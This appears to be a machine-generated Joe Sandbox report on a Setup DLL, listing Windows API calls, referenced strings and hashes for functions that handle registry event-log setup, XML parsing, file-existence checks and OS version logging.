                                                                                              • API String ID: 969748958-1544932709
                                                                                              • Opcode ID: f15a5d64650b3eec377a83351dab0a985b50acdeb67acfa69b3a26a4d7f6c0e8
                                                                                              • Instruction ID: 93d4a1577c5e628718ba570ca0f977fc72a6ea756e6f6b7d153c776c1fb24004
                                                                                              • Opcode Fuzzy Hash: f15a5d64650b3eec377a83351dab0a985b50acdeb67acfa69b3a26a4d7f6c0e8
                                                                                              • Instruction Fuzzy Hash: 5C41E431589209AFDF21CFA8C986EDE3BA89F25348F004855F910A7F91C731CA59D7A1
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00020019,?,?,6C8F831D,00000000), ref: 6C8C77E8
                                                                                              • RegCreateKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00000000,00000000,00020006,00000000,?,00000000,?,6C8F831D,00000000), ref: 6C8C7805
                                                                                                • Part of subcall function 6C8C787B: __EH_prolog3.LIBCMT ref: 6C8C7882
                                                                                                • Part of subcall function 6C8C787B: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C8C781A,?,6C8F831D,00000000), ref: 6C8C78B2
                                                                                                • Part of subcall function 6C8C787B: RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C8F831D,00000000), ref: 6C8C78D8
                                                                                                • Part of subcall function 6C8C787B: RegCloseKey.ADVAPI32(?,?,6C8F831D,00000000), ref: 6C8C78E4
                                                                                                • Part of subcall function 6C8C787B: GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C78F9
                                                                                              • RegSetValueExW.KERNEL32(?,EventMessageFile,00000000,00000002,?,00000208,?,6C8F831D,00000000), ref: 6C8C7836
                                                                                              • RegSetValueExW.KERNEL32(?,TypesSupported,00000000,00000004,?,00000004,?,6C8F831D,00000000), ref: 6C8C7859
                                                                                              • RegCloseKey.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C7861
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Value$CloseOpen$AttributesCreateFileH_prolog3Query
                                                                                              • String ID: EventMessageFile$System\CurrentControlSet\Services\Eventlog\Application\VSSetup$TypesSupported
                                                                                              • API String ID: 4021642227-369282485
                                                                                              • Opcode ID: be10560ae8f542cb7fa434c7f23941c0a60caf6d67f2614aea390a7f7965fc34
                                                                                              • Instruction ID: ec734f9d5f9e147a6adc64c8fa9fa319a0f83cf8d8142b8664b0ac180f593028
                                                                                              • Opcode Fuzzy Hash: be10560ae8f542cb7fa434c7f23941c0a60caf6d67f2614aea390a7f7965fc34
                                                                                              • Instruction Fuzzy Hash: 0711C87174123CBAEB309B529C8DFEBBF7DEF51B58F0004A5B61CA2140C6709E44DAA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CB326
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CB25F: __EH_prolog3.LIBCMT ref: 6C8CB266
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CB5A8
                                                                                              Strings
                                                                                              • No DisabledCommandLineSwitches block was specified, xrefs: 6C8CB5C8
                                                                                              • The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit, xrefs: 6C8CB546
                                                                                              • ParameterInfo.xml, xrefs: 6C8CB554
                                                                                              • DisabledCommandLineSwitches, xrefs: 6C8CB353
                                                                                              • Disabled CommandLineSwitch added: , xrefs: 6C8CB406, 6C8CB4C5
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: Disabled CommandLineSwitch added: $DisabledCommandLineSwitches$No DisabledCommandLineSwitches block was specified$ParameterInfo.xml$The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit
                                                                                              • API String ID: 2489616738-1449725936
                                                                                              • Opcode ID: 9e35677885ed0f63e747aa0882b712fb548b50aa2379fe61d03a2eae5a307972
                                                                                              • Instruction ID: c00210b1c94a8b9b828470ff687f7077c264fd97bf8f5019b3f2c252c488d67f
                                                                                              • Opcode Fuzzy Hash: 9e35677885ed0f63e747aa0882b712fb548b50aa2379fe61d03a2eae5a307972
                                                                                              • Instruction Fuzzy Hash: 3BA17C70A00609DFCB10CFA8CA84AEEBBB5BF95308F244959E021EB790C735DE05CB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C915381
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C9268B5: PMDtoOffset.LIBCMT ref: 6C926989
                                                                                                • Part of subcall function 6C9268B5: std::bad_exception::bad_exception.LIBCMT ref: 6C9269B3
                                                                                                • Part of subcall function 6C9268B5: __CxxThrowException@8.LIBCMT ref: 6C9269C1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8OffsetThrowstd::bad_exception::bad_exception
                                                                                              • String ID: - authored action for this item is NoOp$ - no products affected by this item. Not Applicable. $ - not applicable $ of $Determining state$nameless item
                                                                                              • API String ID: 3118957153-195430493
                                                                                              • Opcode ID: e291cafe8c5e7e358719469006a2fcb9cc24bf337dd4575fa67f5eed003379ae
                                                                                              • Instruction ID: bf3e8782b7dfb6d96fe8005df4bc57e1fec932088073fbf52bc775d36bc552be
                                                                                              • Opcode Fuzzy Hash: e291cafe8c5e7e358719469006a2fcb9cc24bf337dd4575fa67f5eed003379ae
                                                                                              • Instruction Fuzzy Hash: CE61CB7290411CAFCF20DFA8CD05AEE7BB9AF25358F154920E424B7B91C730DA19D7A1
                                                                                              APIs
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8D2E48: __EH_prolog3.LIBCMT ref: 6C8D2E4F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E91B1
                                                                                              Strings
                                                                                              • Global Block Checks, xrefs: 6C8E9087, 6C8E90B7
                                                                                              • : SuccessBlockers evaluated to true., xrefs: 6C8E91E8
                                                                                              • : StopBlockers evaluated to true., xrefs: 6C8E9209
                                                                                              • no blocking conditions found, xrefs: 6C8E9078
                                                                                              • Checking for global blockers, xrefs: 6C8E90A8
                                                                                              • : WarnBlockers evaluated to true., xrefs: 6C8E921D
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: no blocking conditions found$: StopBlockers evaluated to true.$: SuccessBlockers evaluated to true.$: WarnBlockers evaluated to true.$Checking for global blockers$Global Block Checks
                                                                                              • API String ID: 2489616738-2937627051
                                                                                              • Opcode ID: 2617c12631a53d82eafb6b339ac8b7620b2c778a0a5f0c435c748f8add0fa2b2
                                                                                              • Instruction ID: 871c69607788d8e20be1d7112af3b9f90023aa60ac9c48abf7f9594fdc6e44f1
                                                                                              • Opcode Fuzzy Hash: 2617c12631a53d82eafb6b339ac8b7620b2c778a0a5f0c435c748f8add0fa2b2
                                                                                              • Instruction Fuzzy Hash: EC7157B1408345AFC720CF59C984A8BBBE8BB89318F404E2EF59983B50D375E949CB52
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CB014
                                                                                                • Part of subcall function 6C8F91AF: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,6C8CB029,?,0000002C,6C90D55B,?,?,?,?,00000001), ref: 6C8F91C5
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8CB044
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CB128
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8CB163
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                              Strings
                                                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6C8CB0F6
                                                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6C8CB033
                                                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6C8CB1CB
                                                                                              Similarity
                                                                                              • API ID: FreeH_prolog3String$CreateException@8InstanceThrow
                                                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                              • API String ID: 1763430278-2525052916
                                                                                              • Opcode ID: 5af1b5e37119ee2673f31efabaa3fd9c5ffc738fbf5283ec9adf9987f1765dda
                                                                                              • Instruction ID: 232350a7c734256c7cd87445a274466c9f6e5e107f2d66c12f75777b1d55a22c
                                                                                              • Opcode Fuzzy Hash: 5af1b5e37119ee2673f31efabaa3fd9c5ffc738fbf5283ec9adf9987f1765dda
                                                                                              • Instruction Fuzzy Hash: 90519071900109EFCB10DFE8C984DEEBBB8AF15318F14496AE111A7B50DB34DA49CBA2
                                                                                              APIs
                                                                                                • Part of subcall function 6C8C8168: GetFileSize.KERNEL32(?,?,?,?,?,6C8F3B9F,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?), ref: 6C8C8178
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 6C902CA8
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C902CE7
                                                                                              • CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C902D19
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 6C902D32
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C8329: __EH_prolog3.LIBCMT ref: 6C8C8330
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3$AttributesCopyException@8ExistsPathSizeThrow
                                                                                              • String ID: Copy of Header File failed$DHTML Header File doesn't exist$DHTMLLogger
                                                                                              • API String ID: 1055460099-1824744887
                                                                                              • Opcode ID: 352039266fb0339acc5a1009101d9021ac2280a1a925f21db1e9bb951ac39fcb
                                                                                              • Instruction ID: dda16217e4408f2bee8d06dda5b49f952cbd15f07dac34bbd0a3837df2cdb4eb
                                                                                              • Opcode Fuzzy Hash: 352039266fb0339acc5a1009101d9021ac2280a1a925f21db1e9bb951ac39fcb
                                                                                              • Instruction Fuzzy Hash: 76515C712087459FCB20DF68C944A9FBBE9BF99358F400E2EF1A497A90D734D609CB52
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F4E77
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C5FCE: __EH_prolog3.LIBCMT ref: 6C8C5FD5
                                                                                                • Part of subcall function 6C8C5FCE: PathIsRelativeW.SHLWAPI(?,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C8C6018
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8F4F68
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C8F4F7E
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C8F4FA1
                                                                                                • Part of subcall function 6C8C8329: __EH_prolog3.LIBCMT ref: 6C8C8330
                                                                                                • Part of subcall function 6C8CA3BC: __EH_prolog3.LIBCMT ref: 6C8CA3C3
                                                                                              Strings
                                                                                              • ParameterInfo.xml, xrefs: 6C8F4FE5
                                                                                              • File %s is not UTF-16 with Byte Order Marks (BOM), xrefs: 6C8F4FCC
                                                                                              • File %s could not be opened for read, xrefs: 6C8F4F0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CloseDispatcherExceptionException@8FileHandlePathReadRelativeThrowUser
                                                                                              • String ID: File %s could not be opened for read$File %s is not UTF-16 with Byte Order Marks (BOM)$ParameterInfo.xml
                                                                                              • API String ID: 682709548-652212332
                                                                                              • Opcode ID: 8eb08dfa3e3e0834bb8edb3eee15f7505127bd79fe2204886cf0537561f083be
                                                                                              • Instruction ID: 2dcc7b41f7a88c838215906791cd01b2f333a65d9b202aa2bcaaaa1f8025bb42
                                                                                              • Opcode Fuzzy Hash: 8eb08dfa3e3e0834bb8edb3eee15f7505127bd79fe2204886cf0537561f083be
                                                                                              • Instruction Fuzzy Hash: 8F516B71900209EFDF21DFE8CA44ADEBBB9AF14318F14856AE114B7B90D730DA09CB61
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8F7F74
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • _memset.LIBCMT ref: 6C8F7FD4
                                                                                              • GetVersionExW.KERNEL32 ref: 6C8F7FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3H_prolog3_Version_memset
                                                                                              • String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
                                                                                              • API String ID: 3727276431-2914782974
                                                                                              • Opcode ID: df75388b6e7b1c6847ad6a5ac785f183fbe96bfd89877a470e2ad44d14664363
                                                                                              • Instruction ID: 94d183ec2ee44d6aaeb8b6416b835d5ab979a15c21e9709d378ad707191eb5f3
                                                                                              • Opcode Fuzzy Hash: df75388b6e7b1c6847ad6a5ac785f183fbe96bfd89877a470e2ad44d14664363
                                                                                              • Instruction Fuzzy Hash: 8B4159319001189BCB20DBA8CD45FCDB7B9AF19308F4449E5E148ABA90DB70EB99CB91
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C95C8
                                                                                              • VariantInit.OLEAUT32(?), ref: 6C8C95DB
                                                                                              • VariantClear.OLEAUT32(00000008), ref: 6C8C962E
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8C960E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C8C9651
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8C96F8
                                                                                              Strings
                                                                                              • schema validation error: attribute not found - , xrefs: 6C8C9676
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3StringVariant$AllocClearException@8FreeInitThrow
                                                                                              • String ID: schema validation error: attribute not found -
                                                                                              • API String ID: 8365360-3489740836
                                                                                              • Opcode ID: 51e156fe4ae9d8c4085ff978898313fb6fa028abce0cf328b087925ea8d6992c
                                                                                              • Instruction ID: 5592b4f342f212de754e5bcabc72a3d405ccdffd5dbe1ef92f0a3f427e6d4816
                                                                                              • Opcode Fuzzy Hash: 51e156fe4ae9d8c4085ff978898313fb6fa028abce0cf328b087925ea8d6992c
                                                                                              • Instruction Fuzzy Hash: 23415E71900249EFCB10DFE4C984EDEBB75BF15318F144AA9E425A7B80C734DA48CB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C903752
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8CC259: __EH_prolog3.LIBCMT ref: 6C8CC260
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C8FFA6E,0000000C,6C903A05,?,6C8BA794,?), ref: 6C9037B7
                                                                                              • PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 6C903846
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                              Strings
                                                                                              • SetupResources.dll missing from %d directory, xrefs: 6C9037BE
                                                                                              • LocalizedData.xml, xrefs: 6C903835
                                                                                              • LocalizedData.xml missing from %d directory, xrefs: 6C90384D
                                                                                              • SetupResources.dll, xrefs: 6C9037A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FilePath$Exists$AppendModuleName
                                                                                              • String ID: LocalizedData.xml$LocalizedData.xml missing from %d directory$SetupResources.dll$SetupResources.dll missing from %d directory
                                                                                              • API String ID: 3590062302-1245617268
                                                                                              • Opcode ID: 49844db2a5ecd67de3213de9afe3e8de17c1e34280629cecba9cb8e19bdc578e
                                                                                              • Instruction ID: 8e36d880ffea78f24e0969183d3aa2c239699b5276bb6678284e8e3fcbda215f
                                                                                              • Opcode Fuzzy Hash: 49844db2a5ecd67de3213de9afe3e8de17c1e34280629cecba9cb8e19bdc578e
                                                                                              • Instruction Fuzzy Hash: 3231B171904109EFDF20DBB8CD42ADE77B4BF21328F144A65E424EBB95C730DA189BA5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C901021
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CC406: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC426
                                                                                                • Part of subcall function 6C8CC406: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C900F4A,00000004,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC43F
                                                                                                • Part of subcall function 6C8CC406: RegCloseKey.KERNEL32(?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02F92298,00000004,6C900F4A,?), ref: 6C8CC44E
                                                                                              • GetLastError.KERNEL32(?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C8FA58E,?,6C8BA794,?,02F92298,?,00000000,?), ref: 6C901092
                                                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record IsInternal,?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C8FA58E,?,6C8BA794,?), ref: 6C9010F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last$CloseOpenQueryValue
                                                                                              • String ID: Failed to record IsAdmin$Failed to record IsInternal$PerfLab$Software\Microsoft\DevDiv
                                                                                              • API String ID: 716194244-1174128248
                                                                                              • Opcode ID: 97481d079971485e3675b031ba79ac832227fe6acfd36366aed34bf84ab6b61c
                                                                                              • Instruction ID: 5c4da67ff7ab7ca6f2a2ea9d2aff292ce8fd6f7e3c65fddd9d00d0175413d390
                                                                                              • Opcode Fuzzy Hash: 97481d079971485e3675b031ba79ac832227fe6acfd36366aed34bf84ab6b61c
                                                                                              • Instruction Fuzzy Hash: 6531C671B00245EBD710CFA9CE059AE7BB9BF96358B200A2DE420E7B90C774DA05D661
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C76B3
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000010,00000104), ref: 6C8C7711
                                                                                              • GetFileVersionInfoSizeW.KERNELBASE(00000010,?), ref: 6C8C772A
                                                                                              • GetFileVersionInfoW.KERNELBASE(00000010,?,00000000,00000000), ref: 6C8C7745
                                                                                              • VerQueryValueW.VERSION(00000000,6C8A496C,?,?), ref: 6C8C775D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3InfoVersion$ModuleNameQuerySizeValue
                                                                                              • String ID: %d.%d.%d.%d$0.0.0.0
                                                                                              • API String ID: 1538924429-464342551
                                                                                              • Opcode ID: d3657c1b4862397d7d7c4f2e62d8de4f0da10e7fb967135d59f9d4b9e19cb46b
                                                                                              • Instruction ID: 35943a3899e74b740800cf146d3b467568752a3ecf3295c1604914bc3315f4a6
                                                                                              • Opcode Fuzzy Hash: d3657c1b4862397d7d7c4f2e62d8de4f0da10e7fb967135d59f9d4b9e19cb46b
                                                                                              • Instruction Fuzzy Hash: CD318DB1A01219AFDB14DFA4CD84CBFB7B9BF55318B10492AE411A7B90D730D916DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7E7F
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8380: __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: AlwaysUploaded$Disabled$Unknown$User Experience Data Collection Policy$User Experience Data Collection Policy: %s$UserControlled
                                                                                              • API String ID: 431132790-3357067047
                                                                                              • Opcode ID: a43c57af834fe7d519b92366a4fd54d52fe480bf2064c6760e8f0d7a3a9244a6
                                                                                              • Instruction ID: 19884b2659e1774347593b7b38a295a61ef7bde743bd52df9ada0741592581b9
                                                                                              • Opcode Fuzzy Hash: a43c57af834fe7d519b92366a4fd54d52fe480bf2064c6760e8f0d7a3a9244a6
                                                                                              • Instruction Fuzzy Hash: 7E219171904109ABDF10DBE8CA45EDEBBF9AF25308F144856E160F7B81C734DA0AD7A5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E75C9
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • OpenFileMappingW.KERNEL32(00000002,00000000,00000000,?,6C8BAB18,00000008,6C8E76FE,?,?,00000004,6C90C454,?,6C8B95D4,00000000,00000001,?), ref: 6C8E75F2
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 6C8E75FF
                                                                                                • Part of subcall function 6C8CC338: __EH_prolog3.LIBCMT ref: 6C8CC33F
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000424,?,?,?,?,00000001), ref: 6C8E7654
                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,0000021A,?,?,?,?,00000001), ref: 6C8E7670
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 6C8E7679
                                                                                              Strings
                                                                                              • OpenFileMapping fails with last error: , xrefs: 6C8E760F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$File$View$CloseErrorHandleLastMappingOpenUnmap
